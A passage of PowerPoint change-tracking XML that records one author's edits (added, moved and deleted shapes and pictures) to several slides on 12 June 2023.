        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:23:12.366" v="99" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="307230739" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:23:12.366" v="99" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="307230739" sldId="304"/>
            <ac:spMk id="2" creationId="{4CFB3B2C-4EE6-F0F1-D011-723EC265FC4C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add ord replId">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:15.240" v="171" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2324803796" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:15.240" v="171" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2324803796" sldId="323"/>
            <ac:spMk id="4" creationId="{884A9D47-384D-23E1-08E6-ABB300232067}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add ord replId">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:29:08.062" v="170" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="974724562" sldId="324"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:29:08.062" v="170" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:27:06.794" v="136" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:spMk id="4" creationId="{BFC5E5B5-866B-0ACC-EB3C-2E370C98B8C7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:23:39.742" v="103"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:spMk id="6" creationId="{8A676417-EAEF-BB8A-D614-87F618483426}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:26:18.261" v="124" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:spMk id="8" creationId="{97253EFD-A0CC-EB5B-AFA3-EC9397C2EC9C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:26:37.543" v="129" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:spMk id="13" creationId="{51CBC0FB-FB45-1333-1BEF-C48D13FC5A13}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:27:31.185" v="140" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:spMk id="14" creationId="{53BBBCC1-B1EE-1822-BB10-E9B94321F341}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:27:52.826" v="143" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:spMk id="15" creationId="{279A7BAC-7C50-BC44-6F3D-0A42CD7365BF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:23:35.851" v="102"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:picMk id="5" creationId="{306480A3-8DD8-66C3-91D7-D5998EE1F8EB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:26:56.387" v="134"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:picMk id="9" creationId="{5FFC242E-80BA-F2E2-69B8-F2C2D0D9EFE8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:26:48.668" v="131"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:picMk id="10" creationId="{B356BBB8-7386-0874-1443-220B72483C9B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:26:53.872" v="133"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:picMk id="11" creationId="{54F3A5F2-457C-10A5-F0C8-420635960A5C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:26:24.855" v="126"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="974724562" sldId="324"/>
            <ac:picMk id="12" creationId="{74A8E48D-64DE-DB91-F208-1BD7B61B5089}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add ord replId">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:37:11.574" v="197" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4141306224" sldId="325"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:37:11.574" v="197" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:40.131" v="181"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:spMk id="4" creationId="{BFC5E5B5-866B-0ACC-EB3C-2E370C98B8C7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:41.287" v="182"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:spMk id="8" creationId="{97253EFD-A0CC-EB5B-AFA3-EC9397C2EC9C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:42.069" v="183"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:spMk id="13" creationId="{51CBC0FB-FB45-1333-1BEF-C48D13FC5A13}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:24.693" v="173"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:spMk id="14" creationId="{53BBBCC1-B1EE-1822-BB10-E9B94321F341}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:39.209" v="180"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:spMk id="15" creationId="{279A7BAC-7C50-BC44-6F3D-0A42CD7365BF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:53.632" v="186" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:picMk id="3" creationId="{A0D75562-03F9-27E5-2F0F-A8E33BD5523C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:26.912" v="176"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:picMk id="9" creationId="{5FFC242E-80BA-F2E2-69B8-F2C2D0D9EFE8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:25.678" v="174"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:picMk id="10" creationId="{B356BBB8-7386-0874-1443-220B72483C9B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:33:26.428" v="175"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4141306224" sldId="325"/>
            <ac:picMk id="11" creationId="{54F3A5F2-457C-10A5-F0C8-420635960A5C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add ord replId">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:43:38.927" v="259" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1585715422" sldId="326"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:43:38.927" v="259" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1585715422" sldId="326"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:42:59.645" v="249" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1585715422" sldId="326"/>
            <ac:spMk id="6" creationId="{7A417B98-38E6-FB84-1AC1-3C759B037334}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:38:12.794" v="200"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1585715422" sldId="326"/>
            <ac:picMk id="3" creationId="{A0D75562-03F9-27E5-2F0F-A8E33BD5523C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:42:43.175" v="245" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1585715422" sldId="326"/>
            <ac:picMk id="4" creationId="{F758100B-7855-8CB7-E60F-66A8100A3383}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod replId setBg">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:41:55.127" v="239" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1125103431" sldId="327"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:41:47.346" v="237"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1125103431" sldId="327"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:41:47.346" v="237"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1125103431" sldId="327"/>
            <ac:spMk id="9" creationId="{DB691D59-8F51-4DD8-AD41-D568D29B08F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:41:47.346" v="237"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1125103431" sldId="327"/>
            <ac:spMk id="11" creationId="{204AEF18-0627-48F3-9B3D-F7E8F050B1D4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:41:47.346" v="237"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1125103431" sldId="327"/>
            <ac:spMk id="13" creationId="{CEAEE08A-C572-438F-9753-B0D527A515A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:41:47.346" v="237"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1125103431" sldId="327"/>
            <ac:spMk id="15" creationId="{DB93146F-62ED-4C59-844C-0935D0FB5031}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:41:47.346" v="237"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1125103431" sldId="327"/>
            <ac:spMk id="17" creationId="{BF3D65BA-1C65-40FB-92EF-83951BDC1D7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:41:47.346" v="237"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1125103431" sldId="327"/>
            <ac:spMk id="19" creationId="{ADF52CCA-FCDD-49A0-BFFC-3BD41F1B827A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:38:21.810" v="203"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1125103431" sldId="327"/>
            <ac:picMk id="3" creationId="{A0D75562-03F9-27E5-2F0F-A8E33BD5523C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:41:55.127" v="239" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1125103431" sldId="327"/>
            <ac:picMk id="4" creationId="{0A5F6CD2-6A6D-75D4-54CA-2845980621D6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:14:50.445" v="352" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="871958086" sldId="328"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:14:50.445" v="352" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="871958086" sldId="328"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:49:32.999" v="338" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="871958086" sldId="328"/>
            <ac:spMk id="6" creationId="{A349FCB8-8722-A196-6986-30B47C43808E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:49:22.390" v="336" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="871958086" sldId="328"/>
            <ac:spMk id="8" creationId="{AF5E183C-D5E2-9698-CF2C-D469A85A5E37}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:48:59.874" v="330" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="871958086" sldId="328"/>
            <ac:picMk id="3" creationId="{FCECDF1E-A6C8-9428-A23B-C07C46A16934}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:49:03.233" v="331"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="871958086" sldId="328"/>
            <ac:picMk id="4" creationId="{2F87DA34-21A5-ABE1-66CC-F0F2D7302003}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:47:59.122" v="318"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2649968031" sldId="329"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:47:25.838" v="312" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2649968031" sldId="329"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:47:59.122" v="318"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2649968031" sldId="329"/>
            <ac:spMk id="6" creationId="{E0B917E0-E1F4-BCA2-DD40-296871AD64DB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:47:50.184" v="316" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2649968031" sldId="329"/>
            <ac:spMk id="8" creationId="{AE6D27E3-D5D9-9B15-BAC5-34358CB70147}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:45:47.242" v="275"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2649968031" sldId="329"/>
            <ac:picMk id="3" creationId="{AD68A9CA-A144-46E7-DF4C-28D53683F82A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T18:46:00.149" v="279" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2649968031" sldId="329"/>
            <ac:picMk id="4" creationId="{ACF4FD26-D6A7-B81D-7FC7-10DA83185E79}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:20:36.967" v="384" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2943807465" sldId="330"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:19:44.513" v="370" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2943807465" sldId="330"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:20:36.967" v="384" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2943807465" sldId="330"/>
            <ac:spMk id="6" creationId="{A14CACF3-FA0F-947A-0805-2130FF7C08AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:20:23.342" v="382" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2943807465" sldId="330"/>
            <ac:spMk id="8" creationId="{BE346326-757E-4E96-91DA-B93D903FC0AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:20:00.717" v="375" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2943807465" sldId="330"/>
            <ac:picMk id="3" creationId="{DA92987D-4C35-2C0E-C612-1BB2C53520CB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:20:03.279" v="376" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2943807465" sldId="330"/>
            <ac:picMk id="4" creationId="{BBC676E8-E69A-087C-DB51-F08EED3B958A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:25:17.285" v="449" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="107699499" sldId="331"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:24:44.019" v="441" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="107699499" sldId="331"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:20:51.780" v="387"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="107699499" sldId="331"/>
